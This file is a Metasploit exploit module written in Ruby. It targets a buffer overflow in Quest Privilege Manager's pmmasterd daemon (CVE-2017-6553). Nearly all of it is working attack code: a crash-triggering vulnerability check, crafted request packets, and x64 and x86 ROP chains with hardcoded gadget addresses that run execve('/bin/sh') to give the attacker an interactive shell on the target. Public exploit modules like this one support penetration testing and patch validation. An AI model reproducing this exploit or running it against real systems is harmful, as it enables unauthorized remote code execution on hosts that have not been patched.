210 lines
5.9 KiB
Ruby
210 lines
5.9 KiB
Ruby
##
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# This module requires Metasploit: https://metasploit.com/download
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# Current source: https://github.com/rapid7/metasploit-framework
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##
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class MetasploitModule < Msf::Exploit::Remote
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Rank = NormalRanking
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include Exploit::Remote::Tcp
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def initialize(info = {})
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super(update_info(info,
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'Name' => 'Quest Privilege Manager pmmasterd Buffer Overflow',
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'Description' => %q{
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This modules exploits a buffer overflow in the Quest Privilege Manager,
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a software used to integrate Active Directory with Linux and Unix
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systems. The vulnerability exists in the pmmasterd daemon, and can only
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triggered when the host has been configured as a policy server (
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Privilege Manager for Unix or Quest Sudo Plugin). A buffer overflow
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condition exists when handling requests of type ACT_ALERT_EVENT, where
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the size of a memcpy can be controlled by the attacker. This module
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only works against version < 6.0.0-27. Versions up to 6.0.0-50 are also
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vulnerable, but not supported by this module (a stack cookie bypass is
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required). NOTE: To use this module it is required to be able to bind a
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privileged port ( <=1024 ) as the server refuses connections coming
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from unprivileged ports, which in most situations means that root
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privileges are required.
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},
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'Author' =>
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[
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'm0t'
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],
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'References' =>
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[
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['CVE', '2017-6553'],
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['URL', 'https://0xdeadface.wordpress.com/2017/04/07/multiple-vulnerabilities-in-quest-privilege-manager-6-0-0-xx-cve-2017-6553-cve-2017-6554/']
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],
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'Payload' =>
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{
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'Compat' =>
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{
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'PayloadType' => 'cmd_interact',
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'ConnectionType' => 'find'
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}
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},
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'Arch' => ARCH_CMD,
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'Platform' => 'unix',
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'Targets' =>
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[
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['Quest Privilege Manager pmmasterd 6.0.0-27 x64',
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{
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exploit: :exploit_x64,
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check: :check_x64
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}
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],
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['Quest Privilege Manager pmmasterd 6.0.0-27 x86',
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{
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exploit: :exploit_x86,
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check: :check_x86
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}
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]
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],
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'Privileged' => true,
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'DisclosureDate' => 'Apr 09 2017',
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'DefaultTarget' => 0
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)
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)
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register_options(
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[
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Opt::RPORT(12345),
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Opt::CPORT(rand(1024))
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]
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)
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end
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# definitely not stealthy! sends a crashing request, if the socket dies, or
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# the output is partial it assumes the target has crashed. Although the
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# daemon spawns a new process for each connection, the segfault will appear
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# on syslog
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def check
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unless respond_to?(target[:check], true)
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fail_with(Failure::NoTarget, "Invalid target specified")
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end
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send(target[:check])
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end
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def exploit
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unless respond_to?(target[:exploit], true)
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fail_with(Failure::NoTarget, "Invalid target specified")
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end
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request = send(target[:exploit])
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connect
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print_status("Sending trigger")
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sock.put(request)
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sock.get_once
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handler(sock)
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disconnect
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end
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# server should crash after parsing the packet, partial output is returned
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def check_x64
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head = [ 0x26c ].pack("N")
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head << [ 0x700 ].pack("N")
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head << [ 0x700 ].pack("N")
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head << "\x00" * 68
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body = "PingE4.6 .0.0.27"
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body << rand_text_alpha(3000)
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request = head + body
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connect
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print_status("Sending trigger")
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sock.put(request)
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res = sock.timed_read(1024, 1)
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if res.match? "Pong4$"
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return Exploit::CheckCode::Appears
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else
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return Exploit::CheckCode::Unknown
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end
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end
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# server should crash while parsing the packet, with no output
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def check_x86
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head = [ 0x26c ].pack("N")
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head << [ 0x700 ].pack("N")
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head << [ 0x700 ].pack("N")
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head << "\x00" * 68
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body = rand_text_alpha(3000)
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request = head + body
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connect
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print_status("Sending trigger")
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sock.put(request)
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begin
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sock.timed_read(1024, 1)
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return Exploit::CheckCode::Unknown
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rescue ::Exception
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return Exploit::CheckCode::Appears
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end
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end
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def exploit_x64
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head = [ 0x26c ].pack("N")
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head << [ 0x700 ].pack("N")
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head << [ 0x700 ].pack("N")
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head << "\x00" * 68
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# rop chain for pmmasterd 6.0.0.27 (which is compiled without -fPIE)
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ropchain = [
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0x408f88, # pop rdi, ret
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0x4FA215, # /bin/sh
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0x40a99e, # pop rsi ; ret
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0, # argv @rsi
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0x40c1a0, # pop rax, ret
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0, # envp @rax
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0x48c751, # mov rdx, rax ; pop rbx ; mov rax, rdx ; ret
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0xcacc013, # padding
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0x408a98, # execve,
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0
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].pack("Q*")
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body = "PingE4.6 .0.0.27" # this works if encryption is set to AES, which is default, changing E4 to E2 might make it work with DES
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body << rand_text_alpha(1600)
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body << ropchain
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body << rand_text_alpha(0x700 - body.size)
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head + body
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end
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def exploit_x86
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head = [ 0x26c ].pack("N")
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head << [ 0x108 ].pack("N")
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head << [ 0xcc ].pack("N")
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head << "\x00" * 68
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# rop chain for pmmasterd 6.0.0.27 (which is compiled without -fPIE)
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ropchain = [
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0x8093262, # ret
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0x73, # cs reg
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0x804AE2C, # execve,
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0xcacc013, # padding
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0x8136CF0, # /bin/sh
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0,
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0
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].pack("V*")
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pivotback = 0x08141223 # sub esp, ebx ; retf
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writable = 0x81766f8 # writable loc
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body = "PingE4.6 .0.0.27" # this works if encryption is set to AES, which is default, changing E4 to E2 might make it work with DES
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body << rand_text_alpha(104)
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body << ropchain
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body << rand_text_alpha(0xb4 - body.size)
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body << [0x50].pack("V")
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body << rand_text_alpha(0xc4 - body.size)
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body << [pivotback].pack("V")
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body << [writable].pack("V")
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body << rand_text_alpha(0x108 - body.size)
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head + body
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end
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end
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